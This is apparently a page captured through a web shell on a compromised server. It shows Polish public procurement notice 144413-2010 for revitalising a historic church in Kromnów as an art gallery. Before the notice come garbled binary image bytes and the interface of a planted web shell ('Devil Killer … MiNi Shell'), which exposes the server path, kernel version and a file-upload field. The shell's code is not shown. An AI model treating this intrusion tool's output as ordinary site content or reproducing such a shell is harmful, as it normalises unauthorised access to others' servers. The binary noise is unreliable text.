JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100606/144413-N-2010.html

<p class="kh_header"><b>Stara Kamienica: Rewitalizacja zabytkowego  kościoła poewangielickiego w Kromnowie    -            Gmina Stara Kamienica , z przeznaczeniem na Artystyczną Galerię Izerską</b><br>
<b>Numer ogłoszenia: 144413 - 2010; data zamieszczenia: 06.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Kamienica , Stara Kamienica 41, 58-512 Stara Kamienica, woj. dolnośląskie, tel. 75 75 14 337, faks 75 75 14 337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.new.bazagnim.pl/bip_stara_kamienica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja zabytkowego  kościoła poewangielickiego w Kromnowie    -            Gmina Stara Kamienica , z przeznaczeniem na Artystyczną Galerię Izerską.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest  przebudowa wnętrza  zabytkowego kościoła poewangielickiego             z przeznaczeniem  na Artystyczną Galerię Izerską  (zmiana  sposobu użytkowania) obejmująca zakresem:

-  wykonanie fundamentów pod ściany i komin;

- wyburzenie i zamurowanie ścian przyziemia;

-wykonanie ścianek działowych gr.24 i 12 cm z cegły silikatowej i pelnej;

- wykonanie elementów konstrukcyjnych empor i kondygnacji;

- wykonanie stropu typu lekkiego- drewniany,

- wykonanie komina;

- wymiana stolarki okiennej ( na: z drewna klejonego , z zachowaniem dotychczasowego kształtu i  podziału , z zastosowaniem szyb niskoemisyjnych max U= 1,1 W/m2*K szprosów międzyszybowych)  i drzwiowej( 3 pary - do renowacji, 1 para - do odtworzenia); 

- wykonanie instalacji elektrycznej - zasilanie w energię z przyłącza napowietrznego nn -kablem zasilającym do szafki licznikowej, wykonanie rozdzielni głównej z wyprowadzeniem obwodu oświetleniowego, gniazd wtykowych  i gniazd wtykowych do pomieszczeń sanitarnych i zabezpieczonej  ochronnikami przeciwprzepięciowymi, montaż opraw oświetleniowych nawiązujących do historycznego wystroju obiektu;

- wykonanie instalacji wodnej - zasilanie z sieci miejskiej - wykonanie przyłączą , ciepła woda użytkowa z elektrycznych przepływowych podgrzewaczy wody, instalacja wody wykonana z rur stalowych DN 15 i DN 20, wyposażenie w sanitariatach- wyroby standardowe, ceramiczne;
- wykonanie instalacji kanalizacyjnej - z rur PVC z wyprowadzeniem za zewnątrz do sieci kanalizacji sanitarnej - wykonanie przyłącza, 



- wykonanie kotłowni opalanej węglem i miałem kamiennym  na bazie kotła wodnego typu Magna LP 60-   
  69,9kW z całym niezbędnym osprzętem i urządzeniami towarzyszącymi;
- wykonanie instalacji c.o.   - grzejniki stalowe, kompaktowe-płytowe  z armaturą odcinającą             i  regulującą. Instalacja - z rur  stalowych i rur miedzianych,
 -  wentylacja -  mechaniczna pomieszczeń wc.
- wykonanie tynków zwykłych ~600m2  i tynków renowacyjnych ~554 m2 
- malowanie  elewacji farbami emulsyjnymi ~554m2  ;
- oczyszczenie wszystkich elementów ozdobnych z piaskowca - na elewacjach, uzupełnienie braków- imitacją,
- wykonanie posadzek w pomieszczeniach 
- wykonanie nowego pokrycia dachu  z łupka sztucznego  - ~ 553 m2
- wykonanie wjazdu i parkingu na osiem stanowisk - kostka betonowa typu POLBRUK gr.8cm na podbudowie- ~191 m2,;
- uporządkowanie i zagospodarowanie ternu, w tym wykonanie ~38mb ogrodzenia z siatki stalowej rozciągniętej na słupkach stalowych.

Powierzchnia użytkowa     -    326,00 m2
Powierzchnia  zabudowy  -     278,16 m2
Kubatura                              -   3 365,00 m3

Wskaźniki  uzyskane w wyniku  przebudowy kościoła pod nową funkcję użytkową:
                                                    
PRZYZIEMIE     		-	galeria                      158,0  m2
                                                          pom. socjalne            6,2  m2
						 pom. czystości            3,5  m2
                                                          korytarz                     12,0  m2
                                                          WC męski                    4,5  m2
                                                          WC damski N-P-S       7,5  m2
                                                          kotłownia                     6,2  m2
                                                         pom.gospod.-skład      5,9  m2

EMPORA 1 POZIOMU                   galeria 1 poziomu     120,2  m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające może być udzielone wybranemu , w drodze niniejszego postępowania, 
wykonawcy, kiedy zaistnieje konieczność powtórzenia tego samego rodzaju zamówienia zgodnego z przedmiotem zamówienia podstawowego , o wartości nie większej niż  50% wartości zamówienia podstawowego i w okresie do 3 lat od udzielenia tego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.11.12.00-0, 45.11.10.00-9, 45.23.32.00-1, 45.26.25.10-9, 45.33.22.00-5, 45.33.23.00-6, 45.31.10.00-0, 45.26.21.00-2, 45.26.22.10-6, 45.26.25.00-6, 45.45.30.00-7, 45.26.10.00-4, 45.42.20.00-1, 45.42.10.00-4, 45.33.11.00-7, 45.31.21.00-8, 45.33.11.10-0, 45.33.22.00-5, 45.44.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości 
                                    
25 000     PLN    (słownie: dwadzieścia pięć tysięcy złotych)

2. Wadium może być wniesione w następujących formach:

a)	pieniądzu

b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej     
c)	gwarancjach bankowych,

d)	gwarancjach ubezpieczeniowych,

e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109,  poz. 1158,             z późniejszymi zmianami).

3.  W przypadku składania przez wykonawcę wadium w formie gwarancji - gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:

a)	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji ( Zamawiającego tj. Gmina Stara Kamienica ),  gwaranta ( banku lub instytucji ubezpieczeniowej udzielających gwarancji ) oraz wskazanie ich siedzib,

b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,

c)	kwotę gwarancji,





d)	termin ważności gwarancji,

e)  zobowiązanie gwaranta do bezwarunkowego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :

- że  wykonawca ,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy P.z.p.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 ustawy P.z.p.  lub  pełnomocnictw , a nie udowodnił , że nie wynikało to z przyczyn leżących po jego stronie
lub
-  że wykonawca ,  którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie,     lub
- nie wniósł zabezpieczenia należytego wykonania umowy,                     lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

Postanowienia pkt  3. stosuje się również do poręczeń, określonych w pkt 2.b) i  2.e).
4.Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem - na rachunek Zamawiającego,  otwarty w  PLN  :

   
Bank Gospodarki Żywnościowej  S.A. Oddział Operacyjny w Jeleniej Górze
numer 08 2030 0045 1110 0000 0179 9250

z adnotacją w tytule wpłaty :
 Wadium  - Artystyczna Galeria Izerska - Kromnów
      
5.	Wadium wnoszone w innej, niż  _pieniądz_ dopuszczonej przez Zamawiającego formie _ formach wykonawca wnosi do Zamawiającego  przy czym ,  w takim przypadku za termin doręczenia uważa się datę jego zdeponowania u  Skarbnika Gminy lub innej, wskazanej osoby .

6. Wadium  w innej, niż _pieniądz_ dopuszczonej  przez Zamawiającego, formie _ formach  wykonawca  może dołączyć do oferty - pod warunkiem , że umieszczone zostanie w osobnej kopercie opisanej (nazwa wykonawcy, adnotacja: Wadium-- Artystyczna Galeria Izerska - Kromnów), w sposób  umożliwiający  zdeponowanie wadium u Skarbnika Gminy lub innej wskazanej osoby, przed upływem terminu do otwarcia  ofert  - bez konieczności  naruszenia koperty , w której znajduje się oferta. 
 
7.  Wadium należy wnieść przed upływem terminu do składania ofert, przy czym wniesienie wadium               w _pieniądzu_ za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu do składania ofert. 

Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.

8.  Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.
  






9.  Zamawiający  zatrzymuje  wadium  wraz  z odsetkami, jeżeli  wykonawca w  odpowiedzi  na wezwanie , o którym  mowa w punkcie 27.  nie złożył wymaganych przez Zamawiającego dokumentów lub oświadczeń     o których mowa w art.25 ust.1 u.p.z.p., lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.  

10.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 

a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych         w ofercie  

b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy

c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

UWAGA:
Wadium wniesione w formie gwarancji i poręczeń musi obejmować wszystkie przypadki, w których Wykonawca traci wadium na rzecz Zamawiającego. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- popartych należytym wykonaniem w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, prac budowlanych:
a)  polegających na  przebudowie lub remoncie - połączonych z pracami konserwatorskimi , co najmniej trzech  obiektów użyteczności publicznej wpisanych do rejestru zabytków lub objętego inną formą ochrony konserwatorskiej - określonej w ustawie z 23.07.2003 r. o ochronie zabytków i opiece nad zabytkami,               z zakresem co najmniej : wzmacniania fundamentów, wymiany lub wzmacniania drewnianych elementów konstrukcyjnych  ,  wymiany pokrycia dachu ,  wykonania  tynków renowacyjnych , czyszczeniu- piaskowaniu kamieni , uzupełnianiu ozdobnych  detali architektonicznych elewacji. 

Wymagany zakres rzeczowy może być  połączony z dwóch realizacji w obiektach użyteczności publicznej wpisanych do rejestru zabytków lub objętego inną formą ochrony konserwatorskiej - określonej w ustawie z 23.07.2003 r. o ochronie zabytków i opiece nad zabytkami,  

Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych  z wymaganym  zakresem,
sporządzony według wzoru stanowiącego Załącznik Nr 4 do IDW,   z podaniem ich rodzaju i wartości, dat      i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej   i prawidłowo ukończone.

W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN - należy podać kwotę w PLN, przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień protokolarnego odbioru zadania.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie- w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)  - Załącznik Nr 2 do IDW.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nalezy wskazać do uczestnictwa w wykonaniu niniejszego zamówienia 

a) Kierownika Budowy   posiadającego :

° co najmniej pięć (5) lat doświadczenia zawodowego na stanowisku kierownika budowy, w tym przy sprawowaniu funkcji  kierownika budowy na minimum trzech zabytkach nieruchomych .
° uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej 
          lub 
  odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej
  obowiązujących przepisów 
  ° ważny na dzień upływu terminu  składania ofert dokument potwierdzający przynależność  do właściwej          
     Izby Inżynierów Budownictwa,


b)	jedną (1) osobą posiadającą 

°  uprawnienia instalacyjne w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych 
      lub 
odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej wydanych przepisów w zakresie sieci, instalacji wodociągowych i kanalizacyjnych, wentylacyjnych - do pełnienia funkcji Kierownika robót lub majstra robót,

c)	jedną (1) osobą posiadającą 

°  uprawnienia instalacyjne w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
      lub 
    odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej  wydanych przepisów- do pełnienia funkcji Kierownika robót lub majstra robót,
Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej   i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).

Dysponowanie osobami wymienionymi powyżej , należy traktować jako minimalne wymagania Zamawiającego, nie wyczerpujące całości personelu niezbędnego do rzetelnego wypełnienia zobowiązań wykonawcy.

Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:

1)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nie czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do  IDW i fakultatywnie wzór Załącznika Nr 5.1

2)	Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego- Załącznik Nr 6 do IDW.
Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW. 

W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał kadrowy  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)  - Załącznik Nr 2 do IDW
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- poparta posiadaniem 
a) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  stanowiącej co najmniej  równowartość ceny ofertowej za wykonanie przedmiotu zamówienia. 

b)  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej 
- w wysokości co najmniej  500 000  PLN ,

Wykonawcy zobowiązani są przedłożyć informację z banku  lub spółdzielczej kasy oszczędnościowo -kredytowej, w których Wykonawca posiada rachunek, potwierdzającej  
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
Wykonawca może polegać na  zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia   przy czym - jeżeli  dotyczy to środków finansowych - od takiego podmiotu wymagane jest przedłożenie informacji - jak od wykonawcy. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
b) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  stanowiącej co najmniej  równowartość ceny ofertowej za wykonanie przedmiotu zamówienia. 
 Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 u.p.z.p.)  - Załącznik Nr 2 do IDW
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
